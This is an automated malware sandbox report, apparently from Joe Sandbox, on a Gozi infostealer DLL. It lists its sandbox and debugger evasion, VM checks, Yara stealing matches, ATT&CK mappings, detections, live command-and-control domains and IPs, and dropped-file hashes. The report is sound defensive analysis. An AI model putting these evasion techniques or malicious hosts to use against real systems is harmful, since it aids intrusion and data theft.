Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,
Source: C:\Windows\SysWOW64\WerFault.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E3C54C
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 1014
Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 432
Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 1247
Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 805
Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 867
Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 964
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E3C54C
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072165C GetSystemInfo,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: Amcache.hve.7.dr | Binary or memory string: VMware
Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr | Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750087069.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.314927336.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312790180.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312588018.0000000004A62000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

                      Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe | Memory protected: page write copy | page execute and write copy | page guard
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\System32\loaddll32.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,
Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E19C14 GetLocalTime,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0070C10C GetVersionExA,
Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Mitre Att&ck Matrix (techniques listed per tactic; a leading number is the count of matching signatures):
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                      Execution: 2 Windows Management Instrumentation; 11 Native API; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
                      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                      Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                      Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Rundll32
                      Credential Access: 31 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                      Discovery: 1 System Time Discovery; 1 File and Directory Discovery; 116 System Information Discovery; 1 Query Registry; 231 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 1 Remote System Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
                      Collection: 1 Archive Collected Data; 1 Screen Capture; 31 Input Capture; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                      Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
                      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                      Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
                      Source | Detection | Scanner | Label
                      hFGZpat9Mf.dll | 21% | Virustotal |
                      hFGZpat9Mf.dll | 33% | ReversingLabs | Win32.Infostealer.Gozi
                      hFGZpat9Mf.dll | 100% | Joe Sandbox ML |
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      3.0.rundll32.exe.1080000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                      0.2.loaddll32.exe.890184.1.unpack | 100% | Avira | TR/Kazy.4159236
                      3.2.rundll32.exe.e10000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
                      3.0.rundll32.exe.ed0184.5.unpack | 100% | Avira | TR/Kazy.4159236
                      0.2.loaddll32.exe.2500000.4.unpack | 100% | Avira | HEUR/AGEN.1108168
                      3.0.rundll32.exe.ed0184.1.unpack | 100% | Avira | TR/Kazy.4159236
                      3.2.rundll32.exe.1080000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                      3.0.rundll32.exe.e10000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
                      0.2.loaddll32.exe.9e0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                      3.0.rundll32.exe.e10000.4.unpack | 100% | Avira | HEUR/AGEN.1108767
                      3.0.rundll32.exe.1080000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                      3.2.rundll32.exe.ed0184.1.unpack | 100% | Avira | TR/Kazy.4159236
                      0.2.loaddll32.exe.700000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
                      Source | Detection | Scanner | Label
                      giporedtrip.at | 12% | Virustotal |
                      habpfans.at | 12% | Virustotal |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      giporedtrip.at | 211.119.84.112 | true | true | | unknown
                      habpfans.at | 41.41.255.235 | true | true | | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        181.129.180.251 | unknown | Colombia | 13489 | EPMTelecomunicacionesSAESPCO | true
                        41.41.255.235 | habpfans.at | Egypt | 8452 | TE-ASTE-ASEG | true
                        211.119.84.112 | giporedtrip.at | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
                        31.214.157.187 | unknown | Germany | 58329 | RACKPLACEDE | true
                        61.36.14.230 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
                        194.76.226.200 | unknown | Germany | 39378 | SERVINGADE | true
                        IP
                        192.168.2.1
                        Joe Sandbox Version: 34.0.0 Boulder Opal
                        Analysis ID: 560543
                        Start date: 26.01.2022
                        Start time: 17:02:04
                        Joe Sandbox Product: CloudBasic
                        Overall analysis duration: 0h 10m 43s
                        Hypervisor based Inspection enabled: false
                        Report type: light
                        Sample file name: hFGZpat9Mf.dll
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of new started processes analysed: 34
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Detection: MAL
                        Classification: mal100.troj.evad.winDLL@6/6@4/7
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 94.6% (good quality ratio 93.1%)
                        • Quality average: 83.4%
                        • Quality standard deviation: 23.8%
                        HCA Information:
                        • Successful, ratio: 94%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .dll
                        • Override analysis time to 240s for rundll32
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 104.208.16.94, 13.107.43.16
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, l-0007.dc-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                        • Not all processes were analyzed; the report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        Time | Type | Description
                        17:03:26 | API Interceptor | 12x Sleep call for process: loaddll32.exe modified
                        17:03:34 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category: dropped
                        Size (bytes): 65536
                        Entropy (8bit): 0.9231380421791202
                        Encrypted: false
                        SSDEEP: 192:dSiB0oXKHBUZMX4jed+tTN/u7slS274ItWc:civXiBUZMX4jeI5/u7slX4ItWc
                        MD5: 2E9E475BBF5C444FDD216D612789DF16
                        SHA1: 962AD3179B750CF580262E1907A21695CCCF95CA
                        SHA-256: 0064278D09AABB28FEDAF0249EA8CB8FE70CA1E041D4894DCF53040F05E19E31
                        SHA-512: 18EBA813F6A28E2B7751BD3001B4482C544F808182C859505F4FBFDC25EAAA2F687261D01906D9337561C1D8F0E8ACC7BD71C9A5A2211592E1F48E8D3637A661
                        Malicious: false
                        Reputation: low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.7.7.1.8.9.9.3.2.8.3.8.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.7.7.1.9.0.1.2.5.8.0.7.2.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.3.8.9.6.b.0.-.5.3.f.3.-.4.c.c.7.-.8.1.1.7.-.7.c.f.5.a.2.3.c.6.8.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.e.b.9.5.e.c.-.d.e.6.2.-.4.7.8.9.-.9.a.2.7.-.4.9.f.7.3.2.8.d.6.c.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.c.8.-.0.0.0.1.-.0.0.1.6.-.2.4.9.8.-.9.3.a.3.1.9.1.3.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Jan 27 01:03:17 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):50394
                        Entropy (8bit):2.1230258138964713
                        Encrypted:false
                        SSDEEP:192:v7u7354xKvI2O5Skb+XKD74zz7hFK/dDBRvU0SF9Dq0Awi/Y4p:/oQB5Lb+XKIzz7hFadDBR8xFpq0Awi/
                        MD5:E557B9E94120C75B30455B3AB7BB4F67
                        SHA1:2816C199A296B247FADBC24CB7248059CC2AA728
                        SHA-256:A0FB0FDB2F46849AE8FFCCB0F6830134282C4BEF5375EC4B3328CA9957E8FC78
                        SHA-512:1B07B0D1CC742AB0398A7C0CF12C6A6D4AD57568006FC2B39D05E84E9B93F969C117C21CCF5CC366B21403FCE10D970DE56DAA1951B4037F3A93066D91297D33
                        Malicious:false
                        Reputation:low
                        Preview:MDMP....... .......U..a....................................d..../..........T.......8...........T...........@...............`...........L....................................................................U...........B..............GenuineIntelW...........T...........H..a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8312
                        Entropy (8bit):3.6976983898128415
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNips6rRf+Z46YBgah6TgmfTNSOCprR689bW4sfcSm:RrlsNiy6Ff246YBb6TgmfTNSHDWrfI
                        MD5:1F0DCAF8CAD8216C2681E359FDB9FC32
                        SHA1:F83B65FE0F97B36C53DEA67EF86D390C5F2E4874
